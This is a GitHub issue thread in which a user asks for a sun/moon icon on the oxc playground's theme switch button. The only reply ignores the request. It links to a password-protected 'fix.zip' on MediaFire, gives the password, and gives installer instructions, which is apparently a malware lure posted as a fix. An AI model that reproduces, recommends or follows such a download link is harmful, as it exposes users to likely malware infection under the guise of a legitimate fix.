### ISSUE TITLE
playground: icon for switching theme buttons

### ISSUE THREAD

**Issue by heygsc** [oxc-project/playground#31]
It seems that there is no icon for the theme switch button, such as Moon/Sun. Many theme switch buttons we see in our daily lives do have icons.

Before clicking, it may confuse people as to whether this has any other meaning.
<img width="170" alt="image" src="https://github.com/user-attachments/assets/de02e609-539e-4231-845f-2bbb926eceb1">

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
